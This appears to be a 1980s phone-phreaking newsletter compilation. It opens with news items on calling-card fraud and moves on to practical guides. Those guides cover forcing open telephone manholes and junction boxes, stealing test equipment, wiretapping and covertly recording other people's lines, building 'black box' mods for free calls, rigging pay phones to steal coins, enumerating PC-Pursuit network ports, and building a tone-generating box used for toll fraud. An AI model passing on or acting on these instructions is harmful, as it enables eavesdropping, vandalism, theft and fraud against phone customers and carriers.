phones, hospitals, and hotels/mote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newest 24-hour operator service center in Dallas began operation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ct. 5.  US Sprint's other operator service centers are  in:  Cherry H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J.; Atlanta; Lombard, Ill. and Reno, Ne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 Sprint is a joint venture of United Telecommunications Inc. of Kans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ty, Mo. and GTE Corp. of Stamford, Con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upplied by Tracker and The Repor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acific Bell Pursuing Calling Card Thi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AN FRANCISCO--(BW)--Pacific Bell is warning consumers to protect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calling cards like any other credit card in the wake of a serie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uds by people posing as phone company employe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Pacific Bell spokesman says customers in the 213, 805 and 916 are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s are being victimized by someone who says he is a telephone comp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loyee investigating calling card fraud.  The individual calls people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e at odd hours, asking for their calling card numbers.  He then sell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to people who use the numbers to make long distance phone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 recently as Monday of this week, 180 long distance calls were bi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 Sacramento area resident who had given his number to the thief just th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urs earl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ording to Pacific Bell, this kind of scheme and other forms of cal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 fraud cost telephone customers nationwide half a billion dollars a y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company offered these tips to consumers to avoid becoming a victim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ing card frau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ver give your calling card number or personal identification numb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one.  Any telephone company employee with a legitimate need to know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er has access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eat your calling card like any other credit card.  Report its lo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mediately by calling the 800 number on the back of the card 800-621-043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you receive a suspicious call regarding your telephone calling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port it by calling the 800 number on the back of the c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you receive a call from someone claiming to be a telephone comp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loyee and asking for your calling card number, ask for a name and numb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back.  Then call the local Pacific Bell business office to repor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id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e suspect was arrested in Southern California last week by a qu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customer who did just that.  Pacific Bell immediately contacte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l police department.  A suspect holding seven stolen calling card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arrested minutes l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cific Bell and long-distance telephone companies will credit custom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calling card charges determined to be fraudulent.  Pacific Bell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idiary of Pacific Telesis Group, a diversified telecommuni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poration based in San Francis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upplied by Tracker and The Repor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 look for information in anyway related to the newsletter.  If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hing of interests, or something that you saw on television, or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spaper, then upload it to one of the boards listed below.  You will rece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 cred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rate's Hollow..................................................(415)593-678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tes Motel......................................................(619)267-029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ought to you in the Cookbook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reaker's Guide to Loop Lines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loop is a wonderous device which the telephone company created as t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for telephone repairmen when testing equipment.  By match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ne of the equipment with the tone of the loop, repairmen can adjust and t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ttings of their telephone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loop, basically, consists of two different telephone numbers.  L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A and B as an example.  Normally if you call A, you will hear a lou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ne (this is a 1004 hz tone), and if you call B, the line will connec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e followed by sil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the format of a loop line. Now, if somebody calls A and some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se calls B--Viola!--A and B loop together, and one connection is m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 Bell did this so repairmen can communicate with each other with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o call their own repair office. They can also use them to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s, like for ANA or Ringback. Also, many CO's have a "Loop Assign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er".  If anyone has any information on these centers please tell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yway, that is how a loop is constructed.  From this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one can find an actual loop line. Going back to the A and B exam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e tone side and the silent side can be either A or B.  Don't be foo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phone company decides to scramble them around to be c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 you now know, loops come in pairs of numbers.  Usually, right after ea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xample: 817-972-189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17-972-189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to save space, one loop line can be written as 817-972-1890/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not always true.  Sometimes, the pattern is in the tens or hundr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occaisionally, the numbers are rand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cities, usually the phone company has set aside a phone number suff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oops will be used for.  Many different prefixes will corresp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at one suff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Arlington, Texas, a popular suffix for loops is 1893 and 1894,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ot of prefixes match with them to make th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xample:  817-460-189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17-461-189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17-465-189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17-467-189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17-469-189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 all loo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a shorter way to write thi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17-xxx-189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xx= 460, 461, 465, 467, 46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You can mix-and-match a popular suffix with other prefixs i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ty, and almost always find other loops or test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For Houston, the loop suffixes are 1499 and 1799.  And for Detro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9996 and 999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en there are a large number of loops with the same prefix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ces are that many loops will be inter-locked.  Using the above exam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rlington loops again, (I will write the prefixes to save space) 460, 46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469 are interlocked loops.  This means that only one side can be used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given time.  This is because they are all on the same circu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clarify, if 817-461-1893 is called, 817-460 and 469-1893 cannot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ed because that circuit is being used.  Essentialy, interlocked loo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all the same line, but there are a variety of telephone numbers to a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so, if the operator is asked to break in on a busy loop line he/s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say that the circuit is overloaded, or something along th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s.  This is because Ma Bell has taken the checking equipment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ne.  However, there are still many rarely used loops which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verfied and can  have emergency calls taken on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 you have found out, loops come in many types.  Another type of loop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tered loop.  These are loop lines that the tel co has put a filter on,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normal human voices cannot be heard on either line.  However,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quencies may be heard.  It all depends on what the tel co want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p to be used for. If a loop has gotten to be very popular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l population or used frequently for conferences, etc. the tel co may fil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op to stop the unwanted "traffic".  Usually, the filter w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ved after a few months, thoug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ought to you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Ma Bell Work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is  article,  I  will first describe  the  termin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ring,  and  terminal  hardware most commonly used in  the  B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ystem, and I will include section on methods of using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OCAL NET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ocal   telephone   network   between   the    cent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fice/exchange  and  the  telephone subscribers can  be  brief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scribed as foll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the  central office (or local exchange) of  a  cert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fix(es), underground area trunks go to each area that has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fix  (Usually  more than one prefix per area.)  At  every  f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reets or tract areas, the underground cables surface. They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to the telephone pole (or back underground,  depending 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a)  and  then  to the subsribers house (or in the case  of  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artment building or mutliline business,  to a splitter or  d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ibution box/pa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that  we have the basics,  I'll try and go in-depth  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j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UNDERGROUND CAB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are sometimes inter-office trunks,  but usually in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sidential  area they are trunk lines that go to bridging  hea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distribution  cases.  The cables are about 2-3  inches  th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ies),  and  are  either  in  a metal  or  pvc-type  pipe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miliar).  Rarely (maybe not in some remote rural areas) ar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bles  just 'alone' in the ground.   Instead they are usually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  underground cement tunnel (resembles a small sewer or  sto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ain.)   The manholes are &gt;heavy&lt; and will say 'Bell system'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m.  they can be opened with a 1/2 inch wide crowbar (Hook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serted  in the top rectangular hole.  There are ladder rungs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lp you climb down.  You will see  the cable  pipes on the w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e blue and white striped one being  the inter-office tru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least  in my  area).  The others  are local  lines,  and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ually marked or color  coded.  There is almost  always a pos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or code  chart on the wall, not to mention  Telco manuals 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ribing the cables and terminals, so I need not get into deta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so, there is usually  some kind  of  test equipment,  and oft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ll test sets are  left  in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RIDGING HEA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nnocent-looking  grayish-green boxes.   These  can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ither trunk bridges or bridging for residences.  The major tru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dging  heads  are usually larger,  and they have the  'Weste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lectric' logo at the bottom,  whereas the normal bridging  hea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ch  may  be different in some areas-depending on the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are served by.  GTE B.H.'s look slightly different.  Also,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be  fooled by sprinkler boxes!)  They can be found  in  j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every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open a bridging head: if it is locked (and you're fee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structive),  put a hammer or crowbar (the same one you used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nhole) in the slot above the top hinge of the right  d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ll hard, and the door will rip off. Very effective! If it is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cked (as usual),  take a 7/8 inch hex socket and with it,  tu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lt  about 1/8 of a turn  to the  right  (you  should hea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ring release inside). Holding the bolt, turn the handle all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y to the left and pull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eck for a test-set (which are often left by Bell employ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inside - First check  for a test-set  (which  are  ofte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Bell  employees).   There should be a panel of terminal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res.   Push the panel back about an inch or so,  and rotat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p  latch  (round with a flat section)  downward.   Releas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nel  and it will fall all the way forward.  There is usuall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rge  amount  of wire and extra terminals.   The  test-sets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ten hidden here,  so don't overlook it (Manuals,  as  well,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times placed in the head).   On the right door is a metal bo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alligator clips.   Take a few (Compliments of Bell.).  On e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or is a useful little round metal device. (Says 'insert ge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clamp  gently - do not overtighten' etc..)  On the front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isc, you should find two terminals.  These are for your t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t.   (If you dont have one, dont despair -I'll show you ways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ke basic test sets later in this artic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ok the ring (-) wire to the 'r' terminal;  and the tip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re  to the other.  (By the way,  an easy way to  determin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rrect polarity is with a 1.5v LED.   Tap it to the term.  pa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it  doesnt light,  switch the poles until it does.   Whe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ghts,find the longer of the two LED poles:  This one will be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ip wire (+).   Behind the disc is a coiled  up  cord.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uld have two alligator clips on it..  Its very useful, bec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nt have to keep connecting and disconnecting the fone (t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t) itself, and the clips work nic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  terminal  board,  there should be  about  10  scr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inals  per  side.   Follow the wires,  and you can see  whi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ble pairs are active.  Hook the clips to the terminal pair,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set!   Dial out if you want,  or just listen (If some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line).  Later,  I'll show you a way to set up a true  'ta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will let the person dial out on his line and receive  cal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normal, and you can listen in the whole time.  More about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major  prefix-area bridging heads,  you can  see  'loc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ps' ,which are two cable pairs (cable pair = ring+tip,  a f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that are directly connected to each other on the  termin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ard.   These  'cheap  loops' as they are called,  do  not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arLy  as  well  as the existing ones set up  in  the  switc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rdware  at the exchange office.   (Try scanning your  prefix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0xx  to 99xx #'s.)  The tone sides will announce themselves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1008 hz loop tone,  and the hang side will give no  respon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irst  person  should dial the 'hang' side,  and  the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rson dial the tone side,  and the tone should stop if you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t the right lo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want to find the number of the line that you're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either try to decipher the 'bridging log' (or what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ch is on the left door.  If that doesnt work,  you can us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llw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NI # (Automatic Number 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 Telco test number that reports to you the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youre calling from (It's the same, choppy 'Bell bitch' v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you get when you reach a disconnect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he   213 NPA - Dial 12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408 NPA - Dial 7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914 NPA - Dial 99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are  extremely useful when messing with any  kind  of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inals, house boxes, e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that we have bridging heads wired, we can go on... (do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get to close and latch the box after all... Wouldnt want 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elco people mad, now, would w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NS" - Telephone Distribution Box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sically, two typ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gt; Large, rectangular silver box at the end of each stre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gt; Black, round, or rectangular thing at every telephone po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pe 1 -   This is the case that takes the underground cable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ridge and runs it to the telephone pole cable (The  low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rgest  one  on the telephone pole.)  The box is always  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le nearest the briging head, where the line comes up.  Look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ll before you Dig - Underground cable' stick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se box is hinged,  so if you want to climb the  po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open it with no problems.   These usually have 2 row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inal se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ould try to impersonate a Telco technician and  re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umber as 'new active' (giving a fake name and fake  re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tc.)   I  dont recommend this,  and it  probably  won't  (almo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itively won't) work,  but this is basically what Telco linem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pe  2 - This is the splitter box for the group of houses a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ole  (Usually  4 or 5 houses).   Use it  like  I  mentio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fore.   The terminals (8 or so) will be in 2 horizontal row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ts.   The  extra  wires  that  are  just  'hanging  there'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sions for extra lines to residences (1 extra line per h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y  the insane charge for line #3!)  If its the  box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house  also,  have fun and swap lines with  your  neighb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ggyback'  them  and  wreak havoc  on  the  neighborhood  (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avesdropping  time...)  Again,  I don't recommend this,  and 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fficult to do it correctly.  Moving right al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PARTMENT / BUSINESS MULTI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TRIBUTION BOX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und  outside the buliding (most often on the  right  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not always...   Just follow the wire from the telephone po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in the basement.   It has a terminal for all the lines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ilding.   Use it just like any other termination box as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ually says 'Bell system' or similar.  Has up to 20 terminals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usually.) the middle ones are grounds (forget   thes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res come from the cable to one row (usually the left one),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ther row of terminals for the other row of terminals fo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ilding  fone wire pairs.   The ring (-) wire is usually the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inal if the set in the row (1 of 10 or more),  and the tip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clamp/screw below it.  This can be reversed, but the c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ir is always terminated one-on-top-of-each- other,  not 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next  to  it.  (I'm  not sure why the other  one  i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bably as aprovision for extra lines) Don't use it  thoug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usually to close to the other terminals, and in my experien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get a noisy conn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al note:  Almost every apartment, business, hotel, or anyw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is  more  than  2  lines  this  termination  lines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ination method is used.  If you can master this type, you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in control of many things...   Look around in your area fo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ilding  that  uses this type,  and practice hooking up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e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an  added  help,here is the basic  'standard'  color-code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ultiline terminals/wiring/e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ngle line:  Red = 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Green = T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Yellow = Groun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Connected  to  the ringer coil  in  individual  and  bridg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inger   phones (Bell only)  Usually  connected to the  gr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ng (-) = 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hite/Red Stri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r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hite/Orange Stri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lack/Yellow Stri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p (+) =  Green (Sometim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yellow, see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hite/Green Stri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hite/Blue Stri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lack/White Stri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ound =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Yel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ESIDENCE TERMINAL BO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mall,  gray (can be either a rubber (Pacific Telephone) or  h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astic  (AT &amp; T) housing deal that connects the cable pair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plitter box (See type 2,  above) on the pole to your  h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ring.  Only 2 (or 4, the 2 top terminals are hooked in parall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e same line) terminals, and is very easy to use.  This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used to add more lines to your house or add an external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tside the h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EST SE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now  you  can  consider  yourself a minor  expert  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inals and wiring of the local telephone network.  Now you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ply  it  to whatever you want to do..  Here's another  help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to  make  a Basic Test-Set and how to use it  to  dial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avsdrop, or seriously tap and record line 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are  the  (usually) orange hand set fones  used  by  Telc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chnicians to test lines.   To make a very simple one,  take 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ll (or other,  but I recommend a good Bell fone like a prin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a trimline. gte flip fones work excllently, though..) fon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llow the instructions be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A 'black box' type fone mod will let you tap into  the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and with the box o,  it's as if you werent there. they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cieve  calls and dial out,  and you can be listening the  who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me! very useful.  With the box off, you have a normal fone t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stru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basic black box works well with good results.   Take the c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f  the fone to expose the network box (Bell type  fones  o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t;RR&gt; terminal should have a green wire going to it (orange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fferent  if  touch tone - doesnt matter,  its the same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connect the wire and connect it to one pole of an SPST sw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nect  a  piece  of wire to the other pole of  the  switch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nect it to the &lt;RR&gt; terminal.   Now take a 10k hm 1/2 watt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sistor  and  put  it  between the &lt;RR&gt;  terminal  ad  the  &lt;F&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inal,  which  should have a blue and a white wire going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fferent for touch tone).  It should look like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lue wire----------&lt;F&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te w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0k Resis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een wire--     !----&lt;R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P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this  does in effect is keep the hookswitch  /  dial  pu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witch (F to RR loop) open while holding the line high with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sistor.   This gives the same voltage effect as if the fone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hook',  while  the 10k ohms holds the voltage right abov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f hook' threshold (around 22 volts or so, as compared to 15-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normal off hook 48 volts for normal 'on-hook'), giv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 Set Version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other  design is similar to the 'type 1' test set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has some added feat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gt;----------------Tip------&lt;To T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igator                        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ip &gt;----------------Ring-----&lt;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x---RRRR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x    = Spst Sw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    = Red LOD        0   = Green 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RRRR= 1.8k 1/2 watt  xxxx= Dpst sw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esis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the SPST switch in on, the LED will light, and the f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l become active.   The green light should be on.  If it is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witch  the dpst.   If it still isnt,  check the polarity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and the LEDs.   With both lights on, hang up the fone.  Th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uld all be off now.   Now flip the dpst and pick up the  f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d  LED shold be on,  but the green shouldnt.   If  i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thing is wrong with the circuit.  You wont get a dial tone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is corr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hook  up  to the line with  the  alligator  cli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uming you have put this circuit inside our fona and have  p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igator clips on the ring and tip wires (As we did befor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uld  have the spst #1 in the off posistion.  This will grea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duce the static noise involved in hooking up to a line. The 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D can also be used to check if you have the correct polar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is  fone you will have the ability to listen  in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ll&lt; audible line activity,  and the people (the 'eavesdrop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use their fone as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that test sets #1 and #2 have true 'black boxes', and can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ed for free calls (see an article about black box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st Set Version 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do test set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ing a trimline (or similar) phone, remove the base and c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of  the wire leads off except for the red (ring -)  an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een  (tip +).   Solder alligator clips to the  lug.   The  w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elf  is  'tinsel' wrapped in rayon,  and doesnt solder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side  the one handset,  remove the light socket (if it has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nstall a small slide or  toggle switch (Radio Shack's micr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niature  spst works well).   Locate the connection of the  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 tip wires on the pc board near where the jack is  loc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the bottom of the handset.  (The wires are sometimes black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ow instead of red and green,  respectively).   Cut the foil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un 2 pieces of wire to your switch.  In parallel with the sw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dd  a .25 uf 200 VDC capacitor (mylar,  silvered mica,  ceram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an electrolytic).  When the switch is  closed,  the  hand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nctions normally.   With the switch in the other position,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listen without being he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To  reduce the noise involved in connecting the clips to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add  a  switch selectable 1000 ohm 1/2  watt  resistor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ries with the tip wire. Flip it in circuit when connecting,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ce on the line, flip it off again. (or just use the 'line dis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ct'  type  switch as in the type 2 test  set  (above)).   Al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void   touching the alligator clips to any metal parts or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inals,  for  i causes static on the line and raises  poep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spic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ECOR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would like to record any activity,  use test set 1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above  (for unattended recording of &gt;all&lt; line  activity),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any test set if you are going to be there to  monitor  w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are dialing, talking, e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ace  a  telephone pickup coil (I recommend the Becoton  T-5  T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il  or equivalent) onto the test set,  and put the TP plug in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ic.  jack of any standard tape recorder.  Hit play, rec,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use.   Alternate  pause when you want to record (I  dont  th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one should have any difficulty with this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if  you  still can't make a test set or you dont hav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ts, there's still hope.  Alternate metho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gt;  Find  a  bell test set in a manhole or a  bridging  head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row it indefinat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gt;  Test sets can  be  purchased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echni-To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5 Apollo Ro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x 36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lymouth Meeting PA., 1946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k for catalog #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are usually $300 - $600, and are supposed to have  M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aling  capability as well as TT dialing.  They are also of m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gher quality than the standard bell test se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would like to learn more about the subjects covered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ugg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gt;  Follow Bell trucks and linemen or technicians and ask  sub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questions. also try 611 (repair service) and ask ques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gt; Explore your area for any Bell hardware,  and experiment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t.  Don't try something if you are not sure what youre d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ecause you wouldnt want to cause problems, would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Money out of Pay Phone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w share with you my experiences with pay telephones.  You will disc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t is possible to get money from a pay phone with a minimum of eff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ory: Most pay phones use four wires for the transmission of data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s to the central office.  Two of them are used for voice (usually re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n), one is a ground, and the last is used with the others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mission of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with this last wire that you will be working with.  On the pay phon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usually did this to, it was colored purple, but most likely will be an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you will do is simply find a pay phone which has exposed wires, such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 can be disconnected and connected at ease with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ar of discovery. You will discover that it is usually a good idea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some electrical tape along with you and some tool for cutting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rial and error, you will disconnect one wire at a time starting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ires different than green and red.  You do want a dial tone du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you want to disconnect is the wire supplying the codes to the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so that the pay phone will not get the 'busy' or 'hang-up' comm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this wire disconnected when you discover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will happen:  Anytime that someone puts any amount of money into the p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the deposit will not register with the phone company an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e held in the 'temporary' chamber of the pay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a day later or so) you just code back to the phone, reconnect the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lick the hook a few times and the phone will dump it all out the sh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s happening is that the 'hangup' code that the phone wa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iving due to the wire being disconnected suddenly gets the cod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mps its' 'temporary' storage sp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make a nice amount of money this way, but reme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a repairman will stop by every few times it is reported broke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air it, so check it at least once a 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joy and have fun.. Many phones I have done this to, and it wo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with e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Based PBX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iginally an Apple ][ file for forgive the upper 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A BETTER UNDERSTANDING OF WHAT A PBX CAN DO, HERE ARE A FEW BAS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DAMENTALS.THE MODERN PBX IS A COMBINED COMPUTER,MASS STORAG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OF COURSE A SWITCHING SYSTEM THAT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PRODUCE ITEMIZED,AUTOMATED BILLING PROCEDURES,TO ALLOW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DENTIFICATION AND MANAGEMENT OF TOLL CALLS. [HAHAH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COMBINE DAYTIME VOICE GRADE COMMUNICATION CIRCUITS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EBAND DATA CHANNELS FOR NIGHT TIME HIGH SPEED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ANSF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HANDLES ELECTRONIC MAIL [ INCLUDING OFFICE MEMO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COMBINE VOICE CHANNELS INTO A WIDEBAND AUDIO/VISU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FERENCE CIRCUIT,WITH THE ABILITY TO XF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PTURE SLIDES,FLIPCHARTS,PICTURES OF ANY K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TH THE EXTERNAL AND INTERNAL CALLING CAPACITY OF THE PBX SYSTEM MUST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EFULLY CONSIDERED BECAUSE MANY BUSINESS OPERATIONS RUN A VERY HIGH RATI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INTERNAL STATION TO STATION DIALING AND A LOW CAPACITY SYSTEM WILL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LE THE REQUESTED TRAFFIC LO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CRITICAL FACTOR IS THE NUMBER OF TRUNKS AND THE CENTRAL OFFICE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ARE USED FOR OUTSIDE CONNECTIONS.ANOTHER IS THE NUMBER OF JUNCTIONS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S] THAT MAKE UP THE INTERNAL CALLING PAT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UNDERSTAND THE SERVICES AVAILABLE ON A TYPICAL COMPUTER RUN PBX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CESSARY TO INTRODUCE THE SUBJECT OF TIME DIVISION SWITCHING.IN A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ISION SWITCHING NETWORK ALL CONNECTIONS ARE MADE VIA A SINGLE COMMON B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ED (OF COURSE) A 'TIME-DIVISION BUS'.EVERY LINE TRUNK THAT REQUIRE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ON WITH ANOTHER IS PROVIDED WITH A PORT CIRCUIT.ALL PORT CIRCU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ACCESS TO THE TIME DIVISION BUS THROUGH A TIME DIVISION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WO PORTS REQUKRE CONNECTION,THEIR TIME DIVISION SWITCHES OPERATE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VERY HIGH FREQUENCY (16,000 TIMES PER SECOND).THIS TECHNIQUE,WHICH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ED 'SPEECH SAMPLING',ALLOWS MANY SIMULTANEOUS CONNECTIONS OVER THE S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DIVKSION BUS.EACH CONNECTION IS ASSIGNED A TIME INTERVAL,THE 'TIME SL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NUMBER OF TIME SLOTS IDENTIFIES THE NUMBER OF SIMULTANEOUS CONN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ONS AMONG PO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XT CRITICAL ITEM IS CIRCUIT PACKS.THE SYSTEM ELEMENTS THAT WE W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CRIBING IN FUTURE TUTORIALS [LINES/TRUNKS/SWITCHES,MEMORY AND CONTROL]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AINED ON PLUG IN CIRCUIT PACKS.EACH LINE CIRCUIT PACK CONTAINS A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LINES,IN EXAMPLE,FOUR.BUT THE ASSIGNMENT OF STATION NUMBERS TO ACTU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LINE CIRCUITS IS FLEXI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YSTEM MEMORY IS CONTAINED IN CIRCUIT PACKS WHICH PROVIDE THE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SSING FUNCTIONS.THE CIRCUIT PACKS ARE HELD IN SMALL FRAMES CA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IERS'.WITHIN EACH CARRIER,THE CIRCUIT PACKS ARE PLUGGED INTO POSI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LOTS'.EVERY CIRCUIT CAN BE ADDRESSED BY,SAY A FIVE DIGIT NUMBER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S ITS LOCATION BY CARRIER-SLOT-CIRCUIT.... [STARTING TO GET THE IDE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CAN BE THREE TYPES OF CARRIERS IN A MODERN PBX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LINE CARRI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TRUNK CARRI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CONTROL CARRI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NE CARRIERS CONTAIN STATION LINES.IN A.T.&amp; T.'S "DIMENSION" MODEL,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A TOTAL OF 52 TO 64 LINES ARE PROVIDED.THE TRUNK CARRIERS CON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OTS FOR 16 TRUNK CIRCUIT PACKS.THE CONTROL CARRIER INCLUDES PROCESS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MORY,CONTROL CIRCUITRY,DATA CHANNELS FOR ATTENDANT CONSOLE CONTROL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FFIC MEASUREMENT OUTPU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X SYSTEMS WILL DIRECTLY REFLECT THE TYPES OF SERVICES OFFERED AT THE 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CC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CC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PICTUREPHONES [SOONER THAN YOU THINK MY PHRIE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ON CONTROL SWITCHING ARRANGEMENTS ( CCSA ) PERMIT ANY UNRESTRICTED TE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STATION TO CALL ANY OTHET INTERNAL OR EXTERNAL SYSTEM STATION BY U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NDARD SEVEN DIGIT NUMBER.ALTERNATE ROUTING IS A FEATURE OF CCSA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TERFACILITY,ALTERNATE ROUTED CALLING PATHS ARE ACCOMPLISHED AT THE TE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COMPANY CENTRAL OFFICE LEVEL,NOT AT THE PBX LEV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YSTEM OF INTEREST TO LARGE SCALE TELEPHONE USERS IS COMMON CHANNEL I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SIGNALLING (CCIS).TYPICALLY,THIS TECHNIQUE EMPLOYS COMMON CHANNEL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Y ALL INTERFACILITY SIGNALLING INSTRUCTIONS: DIAL PULSES,ON HOOK (I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 HOOK (BUSY),AND SO ON,BETWEEN TWO SWITCHING CENTERS. [ GETTING WA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CIS REPLACES OLDER METHODS OF INTEROFFICE SIGNALLING SUCH AS 'IN BAN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BAND' TECHNIQUES. BY THE WAY,REAL PHREAKS ARE SELLING THEIR BOXE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IOTS WHO STILL THINK THE'RE WORTH ALOT...THE FORMER (IN BAND) TRANSM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LING DATA WITHIN THE NORMAL CONVERSATION BANDWIDTH.IT'S SHORTCOMING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FALSE INFORMATION MAY BE TRANSMITTED DUE TO UNIQUE TONE OR NOI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BINATIONS SET UP IN THE TALKING PATH. [THIS IS THE OFFICIAL REASO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BAND SIGNALLING TECHNIQUES PLACED THE INTEROFFICE DATA IN SPEC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NELS,GENERALLY ADJACENT TO AND IMMEDIATELY ABOVE THE VOICE PATH.TO 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E INTERCHANNEL INTEGRITY,OUT OF BAND SIGNALLING REQUIRES VERY EFFECI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TERING OR GREATER 'BAND GUARD' SEPERATION BETWEEN CHANNE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ought to you in the Cookbook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ubject:    PC-Pursuit Port Statistic'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ate:       06/29/8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ritten by: PC-Pursuit Us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t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last 30 days of PC-Pursuit have been extrem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ntroversial.  Users and ex-users have demanded accu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tatistics, and Telenet has provided us with very li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nd the data that was provided is questionable.  Well,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s some data that is guaranteed to be accurate and m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elenet scream. If you wish to update this data on your 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 will tell you how later in this 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following chart consists of all the direct Tele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ddresses of the PC-Pursuit city nodes and the total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f modems on each node.  Here is what the data me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JNEW/3 2011    .12    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      \-- Total Number of Modems in NJN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 Last Working Suffix of Address sequ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Direct Telenet Address Prefi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Baud Rate of This Port is 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Mnemon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lease note that there are several perfectly legal ways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nnect to a PC-Pursuit port such as NJNEW/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ays To Connect to NJNEW/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   C D/NJNEW/3,PCP10000,&lt;password&gt;   [H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   C 2011,PCP10000,&lt;password&gt;        [H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3)   C 2011.10,PCP10000,&lt;password&gt;     [NON H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first, is self explanatory.  The second does the s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ing as the first, only that it is slightly faster and gi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user much greater flexibility.  The third is an exam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flexibility, because a request is made to connect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enth, and only the tenth, modem on the NJNEW/3 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y simply attempting to connect to every single mod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 the 2011 chain, we were able to count the number of mod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 each port and come up with the following charts which w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extracted on June the twenty ninth of the year 198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otary   Direct  Max.  City     Rotary   Direct  Max.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rt     Address Range Total    Port     Address Range Tot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JNEW/3  2011    .12   56       CAOAK/3  4155    . 4   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201301  .40                 /12 415216  .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20122   . 4                 /24 41511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CWAS/3  202115  . 6   46       CAPAL/3  415106  . 4   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202116  .24                 /12 415224  .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202117  .16                 /24 &lt;NONE&gt; &lt;NON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THAR/3  &lt;NONE&gt; &lt;NONE&gt;  8       CASFA/3  415215  . 6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203120  . 8                 /12 415217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lt;NONE&gt; &lt;NONE&gt;               /24 41523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ASEA/3  20617   . 4   30       ORPOR/3  50320   . 2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20619   .22                 /12 50321   . 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20621   . 4                 /24 &lt;NONE&gt; &lt;NON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YNYO/3  212315  . 4   22       AZPHO/3  60222   . 4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212316  .14                 /12 60223   .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21228   . 4                 /24 60226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LAN/3  213412  . 8   40       MNMIN/3  612120  . 4   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213413  .28                 /12 612121  .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21323   . 4                 /24 61222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XDAL/3  214117  . 6   30       MABOS/3  617311  . 4   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214118  .22                 /12 617313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21422   . 4                 /24 61726   .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APHI/3  215112  . 6   36       TXHOU/3  713113  . 8   4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2155    .22                 /12 713114  .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21522   . 8                 /24 71324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HCLE/3  21620   . 4   26       CACOL/3  71423   . 4   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21621   .18                 /12 7144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216120  . 4                 /24 71424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DEN/3  303114  . 4   40       CASAN/3  714119  . 4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303115  .18                 /12 714213  .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30321   .22                 /24 714124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LMIA/3  305120  . 6   28       CASDI/3  714102  . 4   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305121  .18            (619)/12 714210  .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305122  . 4                 /24 714121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LCHI/3  312410  . 8   40       UTSLC/3  80120   . 4   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312411  .28                 /12 80121   .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31224   . 4                 /24 80112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IDET/3  313214  . 6   30       FLTAM/3  81320   . 4   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313216  .18                 /12 81321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31324   . 6                 /24 813124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SLO/3  3145    . 4   16       MOKCI/3  816104  . 4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314421  . 8                 /12 816221  .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31420   . 4                 /24 816113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GAATL/3  404113  . 8   32       CAGLE/3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404114  .20                 /12 81821   .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40422   . 4                 /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SJO/3  408111  . 4   34       CASAC/3  9167    . 4   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40821   .26                 /12 91611   .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408110  . 4                 /24 91612   .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IMIL/3  41420   . 4   24       NCRTP/3  91920   . 4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2 41421   .16                 /12 91921   .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 414120  . 4                 /24 919124  . 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01/29/89       PC-Pursuit Modems Statistics Ch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Modems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nemonic        300      1200      2400     Tot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JNEW            12        40         4        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CWAS             6        24        16        4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THAR             0         8         0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ASEA             4        22         4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YNYO             4        14         4        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LAN             8        28         4        4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XDAL             6        22         4        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APHI             6        22         8        3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HCLE             4        18         4        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DEN             4        18        22        4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LMIA             6        18         4        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LCHI             8        28         4        4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IDET             6        18         6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SLO             4         8         4        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GAATL             8        20         4        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SJO             4        26         4        3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IMIL             4        16         4        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OAK             4         8         4        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PAL             4         8         0        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SFA             6        10         4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RPOR             2         6         0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ZPHO             4        12         4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NMIN             4        14         4        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BOS             4        20         8        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XHOU             8        24        10        4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COL             4        10         4        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SAN             4        12         4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SDI             4        14         4        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UTSLC             4        14         4        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LTAM             4        10         4        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KCI             4        12         4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GLE             4        18         4        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SAC             4         8         4        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CRTP             4        12         4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tal           166       562       170       8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verage   4.8823529 16.529412         5 26.4117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TE: CASAC/3, CASAC/24 were estim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 think the statistics basically speak for themsel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 am sure there will no doubt be hundreds of people who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t smile at the number of specific kinds of ports suppor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t to mention the number of 'dead' or 'down' modems you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ind when you verify the totals.  Usually, 2% to perhaps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f the modems are 'dead' with specific ones repeated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ailing week after wee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istory Of This Coll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lmost a year ago a small selected group of devo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dividuals got together to discuss problems with the P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ursuit Network, in the middle of our discussions a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as asked as to how the network really processes our cal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is was intended to help us assess SET? commands and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uch matters.  When the address hypothesis was offered w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quickly set out to prove it.  It was proved in about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inutes with the discovery of 2011 (First try was xxx1).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ata has continually been collected and analyzed ever si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ut until now, has never been mass rele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small group of teen age hackers discovered sev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teresting things that can be done with these addres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ny of which will not be discussed here short of mentio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at these ports connected to via these addresses are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imited to PC-Pursuiters.  You can, however, fight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alout modems in cities via the address method.  Dead mod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n be located in about 10 seconds (faster than Telenet),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n either be reported or skipped past by the user connec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 the next modem in the sequence after the "dead"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te: Say 2011.3 is dead, connect to 2011.4 and you will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ast it.  If 2011.4 is busy, go to 2011.5.  The reader shou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tice 2011.3 is the same as 2011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most interesting value of these addresses is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ne can count the number of ports that Telenet keeps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ret (Grin).  When there were only 28 cities in ope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re were an average of 2.7 300 baud, 9.4 1200 baud, and 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400 baud modems in each city.  Some cities had as little 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 modems on a port and as many as 12.  Only recently ha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modems per city begun to ju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ow To Update The Count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n ID is not required to "request" one of these p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us the tallying can be done any time of day by simp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yping the number at the @ prompt.  Here is an example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ur modems (NJNEW/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0122.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01 22A REFUSED COLLECT CONNECTION 19 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012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01 22B REFUSED COLLECT CONNECTION 19 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012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01 22C REFUSED COLLECT CONNECTION 19 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012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01 22D REFUSED COLLECT CONNECTION 19 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012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01 22E ILLEGAL ADDRESS 19 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reader should be aware that PC-Pursuit ports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espond with '19 80'.  Do not confuse it with '19 00', whi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re not PC-Pursuit ports.  In the above example we know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re four ports because the forth was the last existing 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efore we encountered the 'ILLEGAL ADDRESS.'  There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veral ways to signify that you have gone one beyond the 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f the p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  xxx xxx ILLEGAL ADDRESS 19 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  xxx xxx NOT OPERATING 19 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3)  The request freezes (Note: Issue a BREAK then D &lt;C/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 abort the attempt yielding 'ATTEMPT ABOR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should be aware that modems which are out of order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iddle of the sequence can respond with 'NOT OPERATING'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y freeze the request.  You should also note that w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updating the existing list, all you need to do is try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equest the next modem beyond the end as of the last che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inding Newly Added P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ny ports have not yet been installed; hence, we do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yet know the addresses.  New ports may be found by ente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first three digits of the area code and appending (1-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01-129, 201-229, 301-329, etc.) until the 'REFUSED COLL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NNECTION 19 80' appears.  Once this is found, simply lo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nto the port address with your ID and R/V dial some si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ries of digits, disconnect the port, then connect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C-Pursuit mnemonic you think it might be and R/V redial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ast number.  If the numbers match, you found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arl Box Pla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arl Box:Definition - This is a box that may substitute for many bo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produce tones in hertz. The Pearl Box when operated correctly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duce tones from 1-9999hz. As you can see, 2600, 1633, 1336 and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ucial tones are obviously in its sound spectr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you will need in order to build The Pearl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1, C2:.5mf or .5uf ceramic dis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paci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1.....NPN transistor (2N2222 wo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1.....Normally open momentary SP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2.....SPST toggle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1.....Standard 